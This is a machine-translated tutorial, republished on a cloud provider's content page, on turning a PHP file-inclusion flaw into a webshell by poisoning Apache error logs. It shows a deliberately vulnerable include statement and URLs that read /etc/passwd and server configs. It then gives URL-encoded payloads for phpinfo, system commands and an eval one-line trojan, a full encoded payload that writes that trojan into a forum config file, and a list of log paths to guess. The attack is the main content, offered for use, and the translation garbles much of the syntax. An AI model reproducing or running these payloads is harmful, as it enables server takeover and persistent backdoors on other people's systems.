Php contains apache logs to obtain the shell Method

Source: Internet
Author: User
Tags apache error log

For the use of Apache logs in php, the submitted website contains php statements, which are then recorded by the Apache server, and then included and executed by php. Of course, the biggest drawback of this method is that Apache logs will certainly be too large, and the response will certainly time out or something, so it is also restricted by conditions. This is a kind of research. The following is my testing process. I think it is very interesting. Let's take a look.
For example, if a php vulnerability exists, a php vulnerability contains a statement.
 
<? Include ($ zizzy);?> // Contains the variable $ zizzy
 
You can
Http://xxx.com/z.php? Zizzy =/etc/inetd. conf
Http://xxx.com/z.php? Zizzy =/proc/cpuinfo
Http://xxx.com/z.php? Zizzy =/etc/passwd
 
You can use the include statement to view some system environment and password files.
 
Let's take a look at the log content below:
For example, the location of our Apache server configuration file is here
/Usr/local/apache/conf/httpd. conf
So let's include httpd. conf to see the path information.
Http://xxx.com/z.php? Zizzy =/usr/local/apache/conf/httpd. conf
 
Read the configuration information of Apache. Some information is listed here.
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot/home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog/home/virtual/www.xxx.com/logs/www-error_log
CustomLog/home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias/cgi-bin // home/virtual/www.xxx.com/cgi-bin/
Alias/icons // home/virtual/www.xxx.com/icons
</VirtualHost>
 
While we submit http://xxx.com/z.php? Zizzy =/home.../logs/www-error_log
You can read the Apache error log.
 
[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
Exist:/home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
Exist:/home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
Exist:/home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
Directory as script:/home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
Directory as script:/home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
Directory as script:/home/virtual/www.xxx.com/kkkkkkk
 
Data logs/home/virtual/logs.
 
For example, if we submit this sentence, <? Phpinfo ();?> // View php Information
Here, we can only submit the URL encoding mode, as I found in the test, <? The tag is not recorded. Only submitted by converting to URL encoding will it be fully recorded.
 
Here, % 3C % 3 Fphpinfo % 28% 29% 3B % 3F % 3E is converted <? Phpinfo () ;?>, We submit
Http://www.bkjia.com /? % 3C % 3 Fphpinfo % 28% 29% 3B % 3F % 3E
 
In this way, an error will be reported and the page cannot be found, and the error will be recorded in the error log.
Http://www.bkjia.com /? Z. php? Zizzy =/home.../logs/www-error_log
In this way, the log file contains the phpinfo information, and the ECHO is a page that displays the php information.
 
 
If possible (the system command can be executed, that is, when the safe_mode is on ),
This is also good,
<? System ("ls +-la +/home");?> // Execute the command to list the objects in home. Remember to convert them to URL format.
 
/Home/
Total 9
-Rw-r -- 1 www.xxx.com silver 55 Jan 20 23:01 about. php
Drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 abc
-Rw-r -- 1 www.xxx.com silver 1438 Dec 3 index. php
-Rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 show. php
-Rw-r -- 1 www.xxx.com silver 5936 Jan 18 admin. php
-Rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 config. php3
-Rw-1 www.xxx.com silver 102229 Jan 21 info.txt
Drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 backup
-Rw-r -- 1 www.xxx.com silver 7024 Dec 4 test. php
 
In this way, the files under home are listed.
Or a Trojan with a single sentence <? Eval ($ _ POST [cmd]);?>,
The converted format is % 3C % 3 Feval % 28% 24% 5 FPOST % 5 Bcmd % 5D % 29% 3B % 3F % 3E.
We submit
Http://www.bkjia.com /? % 3C % 3 Feval % 28% 24% 5 FPOST % 5 Bcmd % 5D % 29% 3B % 3F % 3E
 
Using the lanker's one-sentence Trojan client, it's okay.
 
 
Because the above is very impractical, I found in the test that the log does not move to dozens of megabytes, It is boring to play that way. What we want to do is to write a very practical webshell, which is much better than the previous one.
For example, this sentence is used as a Trojan.
<? Eval ($ _ POST [cmd]);?>
 
You may have come up with this. This is a good solution. Next, let's look at how to write data. In this case,
Open the/home/virtual/www.xxx.com/forum/config.php file in fopen, and then write the file <? Eval ($ _ POST [cmd]);?> This statement is a Trojan server statement. The php statement for connecting tables is
 
<? $ Fp = fopen ("/home/virtual/www.xxx.com/forum/config.php", "w +"); fputs ($ fp, "<? Eval ($ _ POST [cmd]);?> ");
Fclose ($ fp);?> // Write a trojan statement in config. php.
 
We submit this sentence, and then let Apache record it into the error log. If it contains it, it will be successfully written to the shell. Remember to convert it to the URL format before it is successful.
Convert
% 3C % 3F % 24fp % 3 Dfopen % 28% 22% 2 Fhome % 2 Fvirtual % 2 Fwww % 2 Exxx % 2 Ecom % 2 Fforum % 2F
Config % 2 Ephp % 22% 2C % 22 w % 2B % 22% 29% 3 Bfputs % 28% 24fp
% 2C % 22% 3C % 3 Feval % 28% 24% 5 FPOST % 5 Bcmd % 5D % 29% 3B % 3F % 3E % 22% 3B
Fclose % 28% 24fp % 29% 3B % 3F % 3E
We submit
Http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
% 2 Exxx % 2 Ecom % 2 Fforum % 2 Fconfig % 2 Ephp
% 22% 2C % 22 w % 2B % 22% 29% 3 Bfputs % 28% 24fp % 2C % 22% 3C % 3 Feval % 28% 24% 5 FPOST % 5B
Cmd % 5D % 29% 3B % 3F % 3E % 22% 29% 3 Bfclose % 28% 24fp % 29% 3B % 3F % 3E
 
In this way, the error log records the code written into webshell.
Let's include the log and submit it.
Http://www.bkjia.com /? Z. php? Zizzy =/home.../logs/www-error_log
 
In this way, webshell is successfully written, and a trojan statement is written in config. php.
OK.
Http://www.bkjia.com /? Forum/config. php is our webshell.
Directly use the lanker client, and the host is yours.
 
PS: As mentioned above, the folder permission must be writable. You must-rwxrwxrwx (777) to continue. Here you can directly view the directory listed above. All of the above are used when the Log Path is known.
 
For other log paths, you can guess or refer to here.
Appendix: Some log paths collected
.../../Var/log/httpd/access_log
.../../Var/log/httpd/error_log
../Apache/logs/error. log
../Apache/logs/access. log
.../../Apache/logs/error. log
.../../Apache/logs/access. log
../Apache/logs/error. log
../Apache/logs/access. log
.../../Etc/httpd/logs/acces_log
.../../Etc/httpd/logs/acces. log
.../../Etc/httpd/logs/error_log
.../../Etc/httpd/logs/error. log
.../../Var/www/logs/access_log
.../../Var/www/logs/access. log
.../../Usr/local/apache/logs/access_log
.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Usr/local/apache/logs/access. log
.../../Var/log/apache/access_log
.../../Var/log/apache/access. log
../Var/log/access_log
.../../Var/www/logs/error_log
.../../Var/www/logs/error. log
.../../Usr/local/apache/logs/error_log
.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /Usr/local/apache/logs/error. log
.../../Var/log/apache/error_log
.../../Var/log/apache/error. log
../Var/log/access_log
../Var/log/error_log
/Var/log/httpd/access_log
/Var/log/httpd/error_log
../Apache/logs/error. log
../Apache/logs/access. log
.../../Apache/logs/error. log
.../../Apache/logs/access. log
../Apache/logs/error. log
../Apache/logs/access. log
/Etc/httpd/logs/acces_log
/Etc/httpd/logs/acces. log
/Etc/httpd/logs/error_log
/Etc/httpd/logs/error. log
/Var/www/logs/access_log
/Var/www/logs/access. log
/Usr/local/apache/logs/access_log
/Usr/local/apache/logs/access. log
/Var/log/apache/access_log
/Var/log/apache/access. log
/Var/log/access_log
/Var/www/logs/error_log
/Var/www/logs/error. log
/Usr/local/apache/logs/error_log
/Usr/local/apache/logs/error. log
/Var/log/apache/error_log
/Var/log/apache/error. log
/Var/log/access_log
/Var/log/error_log
 
PS: This article is from the internet. I think it is more detailed. If you have any questions, please add them to my blog and provide a QQ Study Exchange Group: 28558272

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.